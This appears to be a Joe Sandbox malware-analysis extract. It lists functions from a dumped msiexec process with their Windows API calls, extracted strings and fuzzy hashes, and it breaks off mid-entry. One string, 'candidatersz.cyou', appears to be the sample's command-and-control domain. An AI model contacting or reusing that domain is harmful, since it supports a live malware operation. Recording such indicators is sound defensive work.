Instruction Fuzzy Hash: C31276B1540B05CFD3348F26D895B97BBF5FB45314F018A2DE4AB8BA90CB74A419CB80

Function 02EE8A50 Relevance: 7.6, APIs: 5, Instructions: 147
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02EE8A72
GetCurrentThreadId.KERNEL32 ref: 02EE8A85
GetCurrentProcessId.KERNEL32 ref: 02EE8B0C
GetForegroundWindow.USER32 ref: 02EE8BC8
ExitProcess.KERNEL32 ref: 02EE8C2E

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 3d3f71246d5c03a10eef8fd1b7e5106f4f1dc4386b99360783333871972b61a8
Instruction ID: c5bd453fc720119a38cab84dda718856ecf251a15afac5c050b8057026a2295f
Opcode Fuzzy Hash: 3d3f71246d5c03a10eef8fd1b7e5106f4f1dc4386b99360783333871972b61a8
Instruction Fuzzy Hash: 86415873E8461C0BCF28AD65DC5536AB6825BC0344F4AD42DAD8AAB395EEB48C098681

Function 02EEAE60 Relevance: 6.6, Strings: 5, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hl`b, xrefs: 02EEAE79
sdaw, xrefs: 02EEB130
}{, xrefs: 02EEAF8E
sdaw, xrefs: 02EEB211, 02EEB29B, 02EEB2A4, 02EEB21C, 02EEB0F4, 02EEB1E0, 02EEB285
us, xrefs: 02EEAF7E

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: hl`b$sdaw$sdaw$us$}{
API String ID: 0-1674098096
Opcode ID: f10d3dcd5f32d4df749e618a84f94b831ce95ae1b89a81e41392551e79e97e9a
Instruction ID: acf3eaee6a45f957eb2e109cbe39e1adbeefbfefff2324566c463a85f3ab577f
Opcode Fuzzy Hash: f10d3dcd5f32d4df749e618a84f94b831ce95ae1b89a81e41392551e79e97e9a
Instruction Fuzzy Hash: 05C1137168D3918BDB188F6594A136FBBD2AFC260CF1CD92CE4D64B345DB75880ACB42

Function 02F0D896 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F0DD0C

Strings

Ixvo, xrefs: 02F0DC52
c}i?, xrefs: 02F0DD95

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Ixvo$c}i?
API String ID: 3960555810-3728057520
Opcode ID: 6f6f1ec246bb90edebd562de89b4450e612bac3b3e1a52b4b61c005fb00f80b9
Instruction ID: cbd4c5815a430eec2ed23018ba2dd4676baadb20af8529d40824c8216d739bc7
Opcode Fuzzy Hash: 6f6f1ec246bb90edebd562de89b4450e612bac3b3e1a52b4b61c005fb00f80b9
Instruction Fuzzy Hash: CFB1A570604B818EE7258F3980A07B3BFE19F53254F1889AEC5EB873C2D779640ADB51

Function 02EECF05 Relevance: 5.3, Strings: 4, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

us, xrefs: 02EED150
yw, xrefs: 02EED145
DCC14DD7DCCDDEFC783C1B95A0682D54, xrefs: 02EECF4E
candidatersz.cyou, xrefs: 02EED2C4

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: DCC14DD7DCCDDEFC783C1B95A0682D54$candidatersz.cyou$us$yw
API String ID: 0-546352186
Opcode ID: 353a1f34e3933003753b3933be77d8583081b044a9c07410a4f8f17f0c60f0a0
Instruction ID: d728197ad247bcea4dc1887f2feb709fcc7414703e272a4ea203d4d6754b5911
Opcode Fuzzy Hash: 353a1f34e3933003753b3933be77d8583081b044a9c07410a4f8f17f0c60f0a0
Instruction Fuzzy Hash: 7791EDB058D3C28BD7358F219991BEBBBE1EB96304F08A96DC4E94B242DB354405CB93

Function 02F0D214 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 02F0D2F7

Strings

+62), xrefs: 02F0D42B

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: FreeLibrary
String ID: +62)
API String ID: 3664257935-3646136860
Opcode ID: 575bf20748359a98f9694a6ada372080476b98f3f7d87725e6463b5107ee3c2d
Instruction ID: eedb43aacb96a4ebe1174adcdc68acc74a3709522d691d6da5c03a1a06abf041
Opcode Fuzzy Hash: 575bf20748359a98f9694a6ada372080476b98f3f7d87725e6463b5107ee3c2d
Instruction Fuzzy Hash: 88E1B560608B818ED726CF75C4907B3BBE1DF53244F4885ADC5EB8B2C2D7396149DB26

Function 02F18E00 Relevance: 2.8, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<'&!, xrefs: 02F18E2D
<'&!, xrefs: 02F19075

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: <'&!$<'&!
API String ID: 2994545307-2167118800
Opcode ID: 92f03fc92890624beff3b2d17c8aec2de3a58a20d72f49ccf41baeafb3d64304
Instruction ID: 204f5eca87fe0e6ce0460f83d0f1b2d970649b93907e67faf83764f639bdd3a9
Opcode Fuzzy Hash: 92f03fc92890624beff3b2d17c8aec2de3a58a20d72f49ccf41baeafb3d64304
Instruction Fuzzy Hash: 15610437F482105BE3248A28CD90A6BB797EBC5BA8F5EC63CD98593244D775D8068391

Function 02F0D20D Relevance: 1.7, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

+62), xrefs: 02F0D42B

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID: +62)
API String ID: 0-3646136860
Opcode ID: f94308f01c86b20385044f5f8443a5ad237e2c4a2554b9e98be777f909685af1
Instruction ID: 6755818d66898f75e92a04fd0ab1ec3aa56307396d714632f0bdb3fb8dff261f
Opcode Fuzzy Hash: f94308f01c86b20385044f5f8443a5ad237e2c4a2554b9e98be777f909685af1
Instruction Fuzzy Hash: E7E1D620608B818ED725CF79C4907B3BBE2DF53244F18856DC5EA8B3C2D779A50ADB52

Function 02F07850 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

SJK^, xrefs: 02F07C9C

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: SJK^
API String ID: 2994545307-447716731
Opcode ID: 3e77ba6fd0019df506109cae339473237dadfba97b2c53aa2b18cb2bb40e7830
Instruction ID: 0cd16b479f15bb117b88007da5c831b417caf631155358c9136a0b72fd00dedc
Opcode Fuzzy Hash: 3e77ba6fd0019df506109cae339473237dadfba97b2c53aa2b18cb2bb40e7830
Instruction Fuzzy Hash: 51D18872A483008BD714EA28CCD167BF3D2EB85384F1989ACDA8687391E735FD05D791

Function 02F1E3A0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02F1BDEE,?,00000010,?,?,00000018,?), ref: 02F1E3CE

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 02F1B9D0 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

|X, xrefs: 02F1BBA4

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: |X
API String ID: 2994545307-2156541765
Opcode ID: 015ad6915224bc204289c965af57b37a8be271e6f0707f4b4485e6ca008aac17
Instruction ID: 18a574bdddd1e03f996b7e27a4b546a1ba3ad6240dc3be02e8868040e7f77ecf
Opcode Fuzzy Hash: 015ad6915224bc204289c965af57b37a8be271e6f0707f4b4485e6ca008aac17
Instruction Fuzzy Hash: BF614B72F083448BD724CE28D85173FB7E2EBC5758F5AC82DD986A7784D6319C068792

Function 02EEDB6E Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

%*+(, xrefs: 02EEDB9B

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: %*+(
API String ID: 2994545307-3233224373
Opcode ID: ef0bfc503d7ed1e27d97d2918c289b1d116fd1d16a864024de5aaa4ec15779fc
Instruction ID: e17f615d95fb33620f1e59ec296b66dcb06fd347bca9e01cb9cca25d9cf588cb
Opcode Fuzzy Hash: ef0bfc503d7ed1e27d97d2918c289b1d116fd1d16a864024de5aaa4ec15779fc
Instruction Fuzzy Hash: D95155B1A802504BDF38EB209C60BBF735ABF91748F04943CD94B17282EB712916CAD7

Function 02F01447 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171bcc97edff289ecc6ab1458434ad18349703b8c71189d23d37ae4f63f2d021
Instruction ID: 020e5eafbea7789c5854e94fbfc533d5bd135328f55b537e17c2eaf98905cb26
Opcode Fuzzy Hash: 171bcc97edff289ecc6ab1458434ad18349703b8c71189d23d37ae4f63f2d021
Instruction Fuzzy Hash: 7F411275E44105DFDB14DF68D8806AEF7A0FB4A354F04856DEA098B381D774A81ACBA1

Function 02EEA0F0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccdf569da4ba455244c076cdf6cee9a415f1549b278589e5044e4f77e80abdff
Instruction ID: 8831b6d3df68cf793ae94854f8fbed9b73760a7a7d7f6734d0b253b95974d046
Opcode Fuzzy Hash: ccdf569da4ba455244c076cdf6cee9a415f1549b278589e5044e4f77e80abdff
Instruction Fuzzy Hash: B851047269C3004BD3588E60DCC66DF7BE1EB96318F199A3CD486D7341EA3CD9068B86

Function 02F0DC33 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F0DD0C

Strings

Ixvo, xrefs: 02F0DC52
c}i?, xrefs: 02F0DD95

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Ixvo$c}i?
API String ID: 3960555810-3728057520
Opcode ID: 6836b7b42fdb29fc652453d9fd8a399eef3041e38682d18a052c09a07364bfdb
Instruction ID: a2891acbbf7c1d45600d7e4ab37e942c3a7e89313eef6b5b18f2328c05cdd8ac
Opcode Fuzzy Hash: 6836b7b42fdb29fc652453d9fd8a399eef3041e38682d18a052c09a07364bfdb
Instruction Fuzzy Hash: C5A1B470604B818EE7358F3980907B3BBE1AF53254F1888AEC5EB873C2C779640ADB51

Function 02F1E5D0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 02F1E629

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: eec5765217ee5a5dac4c986aca008c2c31caa7d478f5c465d7bd7bb6a3494ebb
Instruction ID: 431bdfd5b595b48d4be41d971cac8a6638dfc3317ec70eaf6c5eaf0ac608ae49
Opcode Fuzzy Hash: eec5765217ee5a5dac4c986aca008c2c31caa7d478f5c465d7bd7bb6a3494ebb
Instruction Fuzzy Hash: 38F0F672D482544BC724DB38D89576BFBE1E792384F158C2DDA92C7242EA358458CF42

Function 02F1B950 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 02F1B9B6

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b0165c1b6f8bd590985eaa38927e5a0c8d3a3f363774a8ac233e33468899cf4b
Instruction ID: c6a0d700dee2683031c737621119522960a8d91d5338f6fa5b1a5b2a1d6cea6e
Opcode Fuzzy Hash: b0165c1b6f8bd590985eaa38927e5a0c8d3a3f363774a8ac233e33468899cf4b
Instruction Fuzzy Hash: 02F02B35A49340CBD3085B18F82176AB7A6DFD6705F15447CD8C597684C7354825CB52

Function 02F1102B Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 02F1107C

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 7bbfc1695ed8a00735f890e80362a21c97466037fbd88b3d0a1d6735edecd1ee
Instruction ID: 74c681a9e0bbfafdb35ec56a18ed02900d39fe8288b1a9d2fef7c6148fcf56ca
Opcode Fuzzy Hash: 7bbfc1695ed8a00735f890e80362a21c97466037fbd88b3d0a1d6735edecd1ee
Instruction Fuzzy Hash: 59018BB66097418FD311CF24C49834BBBF1BB89354F55894DD0D58B392D3B0A948CF82

Function 02F1290D Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 02F12951

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1dc4dbc75f27742f8493821d8014bbdcaf7402ce417f89ff2ae3d87689e703af
Instruction ID: a4e824b199dc9cfab3f88829cc34e3447bf5f17a7d44491051dabd509e7bb1da
Opcode Fuzzy Hash: 1dc4dbc75f27742f8493821d8014bbdcaf7402ce417f89ff2ae3d87689e703af
Instruction Fuzzy Hash: F6F067745493468FE364DF28C1A8B1EFBE1BB84344F11891CE4958B290D7B99558CF82

Function 02F1E61B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 02F1E629

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 371d465f593b16dcb40fb418269a98defe0edf8ca01209c469db1d4a530ac9b8
Instruction ID: e18b63104a8c0340d491167dd64fad99eab27aa79f4971fa8f25c27ee853354e
Opcode Fuzzy Hash: 371d465f593b16dcb40fb418269a98defe0edf8ca01209c469db1d4a530ac9b8
Instruction Fuzzy Hash: D0E08C7AD802089BC220DF24E481524B3A0F7077997060C2ADD57C3351DA32696DCE56

Function 02EECED3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02EECEE5

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 1d4fd610ea5f1e6a4aefaa89579dec4f5276335e9c3fda63d82cced2d675d92f
Instruction ID: 80de961baf612f40dd5f5a4ff7c42e9aa353afa5279595774f96aac2a69e2da5
Opcode Fuzzy Hash: 1d4fd610ea5f1e6a4aefaa89579dec4f5276335e9c3fda63d82cced2d675d92f
